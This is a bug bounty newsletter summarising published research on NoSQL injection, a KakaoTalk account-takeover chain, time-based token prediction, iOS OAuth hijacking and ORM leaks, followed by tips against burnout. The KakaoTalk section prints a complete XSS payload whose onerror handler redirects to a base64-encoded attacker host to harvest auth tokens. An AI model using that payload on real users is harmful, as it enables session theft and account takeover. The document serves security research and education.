[HackerNotes Ep. 77] Bug Bounty Mental - Practical Tips for Staying Sharp & Motivated

We've got fresh writeups including some MongoDB injections, ORMs, and exploits in Kakao and iOS before pivoting into staying motivated and avoiding burnout while hunting.

Author

gr3pme
June 28, 2024

Hacker TLDR;

  • MongoDB NoSQL Injection Techniques: Stellar research from Sourash detailing some MongoDB NoSQL injection techniques via aggregation pipelines. Some takeaways:

    • With aggregation pipelines, it’s possible to bypass the limitations of single collection injections.

    • Monitor aggregate parameters in JSON arrays for $match and $lookup.

    • Add parameters like $lookup, $unionWith, and $match to your wordlist for testing. Any errors or hits on these might give a hint to a potential NoSQL injection.

    • Check out the full research here: https://soroush.me/blog/2024/06/mongodb-nosql-injection-with-aggregation-pipelines/

  • 1 Click ATO - KakaoTalk: A solid exploit chain on KakaoTalk abusing deep links, open redirects, XSS leading to ATO. Some takeaways:

    • Exploit chain: Deep link → open redirect → XSS → redirect to attacker-controlled domain → Harvest session material

    • Payload: kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:"><img src=x onerror="document.location=atob('aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv');">

    • Research URL: https://stulle123.github.io/posts/kakaotalk-account-takeover/

  • Time-Based Secret Leaks: New research on leaking secrets via time-based vectors, with a new tool being dropped ‘reset-tolkien’ to aid in exploiting these types of bugs:

  • Practical Tips for Staying Sharp & Motivated in Bug Bounty: This section is way too big to summarise here so scroll to the end for this one in-depth, but some of the tips dropped below for motivation and long-term success in bug bounty include:

    • Avoiding the highs and lows vs riding them

    • Diet

    • Competition and Accountability

    • Working on something you’re interested

    • GADGETS

    • Stay on the same target longer than you think you should

    • Goals & celebrations for success

    • Working with high-quality teams with fast communication and threat model validation

    • Collaboration

    • Routinely reduce the friction in your workflow (ask yourself the question - where is the friction and how can I reduce it?)

    • Burnout avoidance

MongoDB NoSQL Injection Techniques

Soroush delivers more top-notch research again. This time we have some techniques on MongoDB NoSQL injection - If you don’t already monitor this guy's Twitter, it’s a safe bet if you want good research.

His latest research highlights the use of MongoDB aggregates to exploit NoSQL injections, allowing attackers to read from, add to, and update data in multiple collections. By leveraging aggregation pipelines and operations like $lookup and $unionWith, attackers can bypass limitations typically associated with single-collection injections. Aggregates are a means of processing various documents, filtering them, formatting them and that sort of thing.

Sometimes impact is limited with NoSQL due to the limited collection you’re placed in - if you want to escalate it further all of these methods below can be used to (depending on the context) go beyond your collection and read others.

Some labs have been linked towards the end of the research if you’d like to get hands-on with these types of attacks.

Some takeaways from this one:

  • Monitor aggregate parameters in JSON arrays for $match and $lookup.

  • Add parameters like $lookup, $unionWith, and $match to your wordlist for testing. Any errors or hits on these might give a hint to a potential NoSQL injection.

1 Click ATO - KakaoTalk

KakaoTalk is the most popular chat app in South Korea. A recent exploit chain demonstrated a vulnerability starting with a deep link capable of opening arbitrary URLs with JavaScript enabled.

It’s a cool exploit chain, it starts with a deep link that could be used to open some arbitrary URLs, and it has JavaScript enabled. Equally, if you hit a specific URL scheme, it will open a set URL with something following the path. Example//host would take you to example.com/host/

This was abused and chained with an open redirect which permitted redirects to any subdomain of the root domain. During this process, they noticed the auth token gets sent as a header, regardless of the domain.

Using some Google dorks, they identified some candidate subdomains to get an XSS; one of these searches flagged a URL which looked like it contained a DOM invader canary. Funnily enough it was a canary, and led them to an XSS!

So, with all these parts, the exploit chain looks like:

Deep link → open redirect → XSS→ redirect to an attacker-controlled domain → Auth token gets sent

This means as an attacker, you send them a link through a chat, the link is a deep link which first hits the open redirect, which redirects to the subdomain which pops the XSS, which is used to redirect to the attacker-controlled page which then harvests the auth token!

The final payload looks like:

kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:"><img src=x onerror="document.location=atob('aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv');">

They break the payload down in the writeup detailing:

  • kakaotalk://buy fires up CommerceBuyActivity

  • /auth/0/cleanFrontRedirect?returnUrl= “compiles” to https://buy.kakao.com/auth/0/cleanFrontRedirect?returnUrl= and redirects to any kakao.com domain

  • https://m.shoppinghow.kakao.com/m/product/Q24620753380/q: had the XSS issue

  • "><img src=x onerror="document.location=atob('aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv');"> is the XSS payload. We had to Base64 encode http://192.168.178.20:5555/ to bypass some sanitization checks.

The full writeup for its one can be found here: https://stulle123.github.io/posts/kakaotalk-account-takeover/

Time-Based Secret Leaks

If you’ve done any form of code review or had a look at some tokens associated with password reset flows or any secret-based transaction, you may have come across the system time or something similar being used as a seed for that function.

This research dives into the world of time-based token generation, particularly focusing on PHP's uniqid and MongoDB's ObjectID. The TL;DR is these two methods in particular can be abused with the ‘Time’ header on a server to predict and manipulate the token values.

Any time you’re performing time-based attacks, there is a mandatory header which should be returned with every request called ‘time’. This date header can be used to perform various operation and is the time the server thinks it is at the time of the request you made.

This research was dropped with a tool which takes the current date from the server, gives it a token and data about your account which are commonly used as seeds and it provides a bunch of different token formats back, including:

  • base32

  • base64

  • urlencode

  • hexint

  • hexstr: ASCII integer encoding

  • uniqid: the PHP function uniqid previously studied

  • uuidv1: the format of a time-based UUID Version 1

  • shortuuid: a popular UUID encoding function

  • mongodb_objectid: the Mongo DB data format studied above

  • datetime: the encoding of a date from a custom date format

  • datetimeRFC2822: encoding a date using the format from the RFC2822 standard

  • md5

  • sha1

  • sha224

  • sha256

  • sha384

  • sha512

  • sha3_224

  • sha3_256

  • sha3_384

  • sha3_512

  • blake_256

  • blake_512

You can check the tool made off the back of this research here: https://github.com/AethliosIK/reset-tolkien and the full research article here: https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html

Interestingly, I think this year is going to be a ripe spot for time-based attacks. James Kettle's upcoming research focuses on practical web-based timing attacks - https://x.com/albinowax/status/1796526507013378073 - being dropped at Black Hat USA and Defcon.

Mobile OAuth Attacks

All IOS users have probably seen the OAuth prompt ‘APP wants to use ‘App1’ to sign in’ when using an app that depends on OAuth for authentication. This research by Julien Ahrens and Evan Connelly highlights how vulnerabilities in iOS's handling of OAuth can lead to account hijacking through malicious apps.

By exploiting custom URL schemes and the ASWebAuthenticationSession, attackers can intercept OAuth authentication codes without user interaction using parameters such asprompt=none. The research demonstrates that this can be abused and done seamlessly, bypassing traditional OAuth protections via the prompt=none set.

It’s worth noting that a pre-req on this is for a malicious app to be installed, but once installed, can perform account takeovers on vulnerable apps. The research deep dives into the code behind the ASWebAuthenticationSession and some interesting behaviours uncovered from the research; we recommend checking out the full writeup.

Takeaways:

  • Prompt=None: This parameter can be abused to bypass user interactions.

  • URL Scheme Registration: Apps can misuse URL schemes, leading to potential hijacks.

  • Fix: Use universal links and require user consent to prevent these attacks.

The full writeup for this one can be found here: https://evanconnelly.github.io/post/ios-oauth/

ORM Leaks

This was some pretty neat research from Elttam on Django’s ORM. If you aren’t familiar with an ORM, it’s essentially a way to design and interact with databases solely in code instead of SQL; adding a layer of abstraction and making it quicker and easier to interact with databases.

With this, ORMs are generally regarded as safe and very rarely see things such as SQLi. This research introduces a new vulnerability class, known as ORM Leaks. This new class abuses insecure uses of ORMs that do not validate inputs when used with certain ORM functions, allowing a means of data leakage.

The conditions for an ORM leak, taken from the blog:

  1. The attacker can control the column to filter results.

  2. The ORM supports an operator that matches a fragment of a value. Suitable operators use the LIKE SQL condition in the generated query, perform regex matching with attacker-controlled patterns or allow comparison operators such as <>.

  3. The attacker can control the operator for a filter.

  4. The queried model has a sensitive field that was not intended to be leaked.

The research details quite a few test cases and different scenarios whereby an ORM leak can arise, including:

In all the examples given, it looks like if you're able to supply a JSON blob which gets passed into filter functions of the ORM, you can potentially supply filter chains. This provides a means of supplying arbitrary parameters, allowing you to hit completely separate fields.

Some of the POCs provided can leak via filters on a character-by-character basis in a boolean-like fashion, with some added vectors for ReDoS-based conditions which can also be used to leak from the ORM. Always fun to watch in a POC gif.

Once again, we’ve run into problems when we can supply arbitrary parameters to a function - very similar to the Reflection or indirect method invocation we discussed in episode 72 regarding the GitHub Enterprise send() bug. This also resembles a similar behaviour to GraphQL, where you can reference any field in any related object and filter on any field.

It's interesting how these abstractions are usually praised for the benefit of added security, only for them to be flipped on their heads over time.

Practical Tips for Staying Sharp & Motivated in Bug Bounty

If you’ve hunted for an extended period, or maybe even a beginner, you probably have faced the volatility of bug bounty - things being downgraded, mass closed, misunderstood or duped. It can be incredibly tough to deal with the mental aspect of this and can lead to burnout quite quickly if it isn’t managed properly.

The guys went through and covered some practical tips for maintaining motivation when hunting in the long term:

Avoiding the highs and lows vs riding them

Getting your hopes up? Getting excited when you pop something before you know if it is a dupe or not?

The rush of finding a bug is pretty intense, especially if you’re new. And we’re all probably guilty of getting a bit too excited before it’s even reported. Being able to manage this and have the mindset of ‘no rewards until it's triaged/paid’ will pay massive dividends from a burnout and even mental health perspective. This will take time and discipline to get right - I myself am going through this process.

Equally, dupes. Although it can feel like a loss, and we’re all gutted if we dupe on a bug, you still did find a valid bug which was accepted by a program. You might not have gotten paid for it but in terms of development and proof of ability, you still found a bug. That shouldn’t be marked as a loss in your book.

Let's jump into some others.

Diet

  • The right diet, right sleep and right meal timings will dramatically alter your performance. Getting this locked down will help you stay in the zone longer, and if you stay in the zone longer, you will be able to hunt for longer.

Competition and Accountability

  • A lot of people thrive off of the competition aspect of bug bounty - the leaderboards, the LHEs, the awards etc. If you’re one of these people, use that to your advantage to get that extra juice when you need to deliver.

Working on something you’re interested

  • Hitting a target, specific functionality, or an area of research or bug class you’re interested in will go a long way. Using a natural pull towards something that intrigues you will, by definition, feel easier to maintain and go after. Take note of the things that interest you and find a target that matches this.

GADGETS

  • A gadget is another step closer to finding a bug. If you’re hunting on a hardened target, noting down and viewing a gadget as a win is especially important to craft more complex and bigger exploit chains.

  • Equally, it's important to remember as a black-box bug bounty hunter, you have to explore EVERY avenue to maximize your hit rate as 98% of the time, you’ll be failing or trying attack vectors that don’t work. Noting weird behaviours and things that might work is key.

Stay on the same target longer than you think you should

  • Force yourself to look at it from a different angle, and once you’ve done this a few times and built this ability, you realise you miss things in the app everywhere. Doing this a few times on a target you’re familiar with will help you craft new vectors, and new ideas and help with a new perspective.

  • Take videos or voice notes brain dumping on a target to watch when you start looking at that target again. This will help you prime yourself and get back in the zone for that target.

Goals & celebrations for success

  • If you’ve crushed something, make sure to celebrate it. Equally, setting goals when hunting which are realistic and permitting yourself to celebrate when you’ve hit them is a massive incentive to help prevent burnout. Even if you did something that wasn’t on your to-do list or goal list for that day and it's relevant, note it down and tick it off for a sense of accomplishment.

Working with high-quality teams with fast communication and threat model validation

  • There’s nothing worse than making a complete POC, you have a beautiful exploit chain crafted and the team doesn’t appreciate it, or understand it. Working with bad programs can put a bad taste in your mouth if you’ve spent a lot of personal time hunting, and can even put you off hunting for good. Finding good programs that work for you, ones what you understand their threat model, and their triage is good quality with reasonable response times can be a massive boost to morale and hunting output.

Collaboration

  • Networking in the community, collabing on bugs, and escalating your pal's bugs are all great ways to stay motivated. I myself have done this a bit and had fun during the AWC - it makes a nice change to the solo nature of hunting and gets the knowledge flowing, ideas bouncing and gadgets going.

    • Equally, finding Discords such as the Critical Thinking Discord channel will help with this a lot.

Routinely reduce the friction in your workflow (ask yourself the question - where is the friction and how can I reduce it?)

  • This is a good one. One gripe I personally had was with JS extraction - a few bookmarks later and a day of scripting, it saves me a lot of time on each target I look at now. If you find yourself context switching from tools, stopping hacking, starting hacking, a bit all over the place, identify where this happens and try to find tooling or a better process for that. These small changes compound over time.

Burnout avoidance

  • Allowing yourself to take breaks

    • If you’re your own boss remind yourself one of the reasons you chose Bug Bounty is for the flexibility - you can take breaks, you can have sick days and you can sometimes not feel up to it. That’s okay, and not letting yourself do that will probably give you less flexibility than before and lead to quicker burnout.

  • Intrinsic (or at least stable, self-worth indicator)

    • DO NOT put your self-worth into hacking. I think this is quite common among new hunters but it simply isn’t true if you don’t find a bug on X target in X time you’re a bad hacker and should feel bad about it. This isn’t true, and self-worth shouldn’t be tied to bug bounty output.

  • Having some sort of routine (whether it is work from 12 am-8 am or 9-5)

    • If you switch from hobbyist to full-time hunter, it changes the relationship you have with bug bounty. Having a solid and clear separation of when you start hacking and when you stop hacking will help maintain a structure long-term, and not give you the feeling of a never-ending to-do list or to-hack list.

Some solid advice and takeaways from this week's pod!

As always, keep hacking!